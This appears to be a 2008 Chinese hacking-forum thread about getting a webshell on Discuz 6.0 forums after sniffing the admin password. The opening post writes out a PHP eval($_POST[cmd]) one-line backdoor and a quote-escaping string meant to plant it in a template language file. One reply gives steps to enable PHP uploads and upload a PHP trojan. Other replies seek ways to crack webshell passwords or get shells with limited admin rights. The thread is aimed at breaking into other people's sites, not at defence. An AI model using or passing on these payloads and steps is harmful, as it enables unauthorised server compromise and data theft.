Board logo

标题: [讨论]关于discuz6.0后台获取shell的方法 [打印本页]

作者: s37su37    时间: 2008-7-20 18:05     标题: [讨论]关于discuz6.0后台获取shell的方法

[讨论]关于discuz6.0后台获取shell的方法
信息来源:邪恶八进制信息安全团队(www.eviloctal.com
议题作者:NEVErSayLovE

   如题, 通过嗅探获得了admin的密码,进了后台,在获取shell这一步出了问题.
   按照一般的说法是在模版管理里编辑语言包actions.随便找一行写入"eval($_POST[cmd]); "(没有引号).提交就写入templates/default/actions.lang.php了,但是我有客户端连接的时候没有反应.
排除一句话和url写错.
    在网上找了下,说法是在最后一行-即游客一行写入
复制内容到剪贴板
代码:
游客\');?>
<?php eval($_POST[cmd]);?><?$languagex= array (
\&#39;g\&#39;=>\&#39;error
依然无果.再次编辑时可以看到游客后面的那个"\"被去掉了.
请问一下大家在discuz6.0后台一般都是怎样得shell的啊,还望不吝赐教.

帖子38 精华2 积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25 查看详细资料引用 报告 回复 TOP 赚更多的钱


neversaylove
晶莹剔透§烈日灼然
作者: google    时间: 2008-7-20 18:05

顶一下,希望大家能帮我看看,提点建设性的意见.
毕竟网上关于discuz6.0.0后台获取shell的文章就只有一篇,而且测试不成功,能成功的方法还请牛人们透露一下啊

帖子38 精华2 积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

liujianst
晶莹剔透§烈日灼然
作者: 山^鹰    时间: 2008-7-20 18:05

2个入侵中遇到的问题
1 拿webshell 问题
对于网站后台只有图片上传的模式 没有备份版快的怎么拿webshell 有办法吗?

2 破shell密码
今天碰到一个站 特别变态 后台超级简单 只能发文字文章
其他的什么都做不了 原因是管理员自己使用asp管理系统 就是我门所所的webshell
请问有什么办法来破shell密码吗?
帖子3 精华0 积分10 阅读权限40 性别男 在线时间1 小时 注册时间2007-3-20 最后登录2008-7-4 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

simpleboy
晶莹剔透§烈日灼然
作者: suiyuan_5    时间: 2008-7-20 18:05

问下楼主 你对DZ6 拿到后台 是 什么方法?只做安静的观众
帖子72 精华2 积分224 阅读权限40 在线时间42 小时 注册时间2006-10-23 最后登录2008-7-2 查看详细资料引用 报告 回复 TOP

ring04h
团队执行官

作者: 老游子    时间: 2008-7-20 18:05

DZ 6.0 后台拿webshell很容易,  大致上有两个位置可以!
一个模版处, 一个数据库处. (PS:不是执行SQL outfile 这种).
帖子3923 精华128 积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

neversaylove
晶莹剔透§烈日灼然
作者: liulangren    时间: 2008-7-20 18:05

4楼的ring04h 你好,邪八上经常看到你的言论,先表示敬意.
如你所说的第一种方法我已经试过了,就在帖子里已经说了不成功.不知你的第二种在数据库处具体是怎么一回事.请讲解一下,谢谢了
3楼的simpleboy,  我已经写得很清楚了是嗅探得到的.你如果还要问,我就只能说是用cain嗅探到的.

帖子38 精华2 积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

ring04h
团队执行官

作者: M58540    时间: 2008-7-20 18:05

你认真的读一下模版内容的代码, 就非常清楚了。
写模版并不是只有所谓的一种方法, 可以适当的转变下思维方式。
帖子3923 精华128 积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

hushui
晶莹剔透§烈日灼然
作者: binfengbin    时间: 2008-7-20 18:05

在线帮助那个模板那里可以写近代码
那第二种方法是什么呢?希望大牛给提示下技术技术 技术!!!!
帖子30 精华0 积分95 阅读权限40 性别男 来自天边 在线时间63 小时 注册时间2006-4-28 最后登录2008-7-17 查看详细资料引用 报告 回复 TOP

heiye88
晶莹剔透§烈日灼然
作者: claire87    时间: 2008-7-20 18:05

被过滤掉了可能。直接写库吧... 还有当不是超级管理员的时候如何拿WEBSHELL呢。也就是当不是论坛创建人的时候。但是却是管理员。就是没有模板编辑和执行SQL那功能
帖子64 精华0 积分239 阅读权限40 在线时间124 小时 注册时间2007-1-25 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

neversaylove
晶莹剔透§烈日灼然
作者: Hemry    时间: 2008-7-20 18:05

谢谢ring04h的帮忙,只是我离阅读代码还有一些差距,还需要多多努力啊,总之,多谢了

帖子38 精华2 积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25 查看详细资料引用 报告 回复 TOP

9989
晶莹剔透§烈日灼然
作者: cartoon    时间: 2008-7-20 18:05

上天也遇到了DZ 6。0  拿到了管理员后台密码 ,只是不知道如何拿SHELL
不知道可不可以把如何拿SHELL的方法说一下? 代码,偶也没能力去阅读!
帖子5 精华0 积分17 阅读权限40 在线时间0 小时 注册时间2007-10-23 最后登录2008-2-11 查看详细资料引用 报告 回复 TOP

逗号
晶莹剔透§烈日灼然
作者: 粤北人    时间: 2008-7-20 18:05

楼主,方便的话,把后台PM 我,我去看看,我知道一种拿SHELL 的方法。不知道在DZ6.0 上能不能实现
非插模版,非数据库.
帖子35 精华0 积分114 阅读权限40 在线时间30 小时 注册时间2005-10-16 最后登录2008-5-22 查看详细资料引用 报告 回复 TOP

simpleboy
晶莹剔透§烈日灼然
作者: QQ小敏    时间: 2008-7-20 18:06

以前用到一种方法
丢上来LZ可以试试

1,在后台修改某版的上传限制(允许上传PHP)
2,注册登录后 直接在该版 附件上传PHP马
3,在 控制面板 处 查看上传路径(当然去后台找也行)就等到SHELL只做安静的观众
帖子72 精华2 积分224 阅读权限40 在线时间42 小时 注册时间2006-10-23 最后登录2008-7-2 查看详细资料引用 报告 回复 TOP

hackpp
晶莹剔透§烈日灼然
作者: skylongo    时间: 2008-7-20 18:06

引用:
引用第9楼neversaylove于2007-11-18 21:31发表的 :
谢谢ring04h的帮忙,只是我离阅读代码还有一些差距,还需要多多努力啊,总之,多谢了
得到 WEBSHELL 了?具体步骤 能否告知 谢谢了!
帖子2 精华0 积分9 阅读权限40 在线时间86 小时 注册时间2005-10-4 最后登录2008-6-2 查看详细资料引用 报告 回复 TOP

可酷可乐
晶莹剔透§烈日灼然
作者: qxkmay    时间: 2008-7-20 18:06

引用:
引用第8楼heiye88于2007-11-18 12:49发表的 :
被过滤掉了可能。直接写库吧... 还有当不是超级管理员的时候如何拿WEBSHELL呢。也就是当不是论坛创建人的时候。但是却是管理员。就是没有模板编辑和执行SQL那功能
这个问题我也遇到了.虽然是管理员但是什么权限都没有...


TO 12楼.貌似上传PHP文件后,在服务器里的扩展名是改过了的,不是PHP的了。
帖子59 精华0 积分162 阅读权限40 在线时间41 小时 注册时间2005-11-5 最后登录2008-5-26 查看详细资料引用 报告 回复 TOP

simpleboy
晶莹剔透§烈日灼然
作者: dongdg    时间: 2008-7-20 18:06

只要记住 路径  可以打开的只做安静的观众
帖子72 精华2 积分224 阅读权限40 在线时间42 小时 注册时间2006-10-23 最后登录2008-7-2 查看详细资料引用 报告 回复 TOP

cser
晶莹剔透§烈日灼然
作者: 有来游去    时间: 2008-7-20 18:06

php4
php5
asp
asa
局限性很大。
帖子2 精华0 积分9 阅读权限40 在线时间19 小时 注册时间2006-3-12 最后登录2008-5-4 查看详细资料引用 报告 回复 TOP

ijyq
晶莹剔透§烈日灼然
作者: bmw    时间: 2008-7-20 18:06

我也试过在游客里插入一句话~,但也过滤了.
请版主或者逗号说下具体怎么说好么~本人菜鸟一个正为这个犯愁呢谢谢
帖子2 精华0 积分9 阅读权限40 在线时间1 小时 注册时间2006-2-18 最后登录2008-6-1 查看详细资料引用 报告 回复 TOP

neversaylove
晶莹剔透§烈日灼然
作者: 死性不改    时间: 2008-7-20 18:06

引用:
引用第11楼逗号于2007-12-02 13:46发表的 :
楼主,方便的话,把后台PM 我,我去看看,我知道一种拿SHELL 的方法。不知道在DZ6.0 上能不能实现
非插模版,非数据库.
我们学校内网的,外面访问不了啊.
to simpleboy: 你哪个方法在discuz6里貌似没有用武之地了啊

帖子38 精华2 积分147 阅读权限40 性别男 在线时间108 小时 注册时间2007-3-18 最后登录2008-5-25 查看详细资料引用 报告 回复 TOP

杀虫剂
晶莹剔透§烈日灼然
作者: 超越    时间: 2008-7-20 18:06

当不是超级管理员的时候如何拿WEBSHELL呢。也就是当不是论坛创建人的时候。但是却是管理员。就是没有模板编辑和执行SQL那功能

请求这种得SHELL的方法。黎叔很生气

帖子70 精华0 积分161 阅读权限40 性别男 在线时间84 小时 注册时间2006-4-27 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

黑暗传说
晶莹剔透§烈日灼然
作者: yuxianglin    时间: 2008-7-20 18:06

看一下是不是把你提交的代码给过了里了
帖子17 精华0 积分-121 阅读权限1 在线时间9 小时 注册时间2008-3-19 最后登录2008-6-13 查看详细资料引用 报告 回复 TOP

柔肠寸断
晶莹剔透§烈日灼然
作者: 剑花江南    时间: 2008-7-20 18:06

请问楼主cain嗅探怎么获取论坛登录密码的?

一般我们都是用它来获取3389密码的

想在此领教下

谢谢
帖子14 精华0 积分216 阅读权限40 在线时间28 小时 注册时间2008-5-17 最后登录2008-7-20 查看详细资料编辑 引用 报告 回复 TOP

yese
夜色

晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2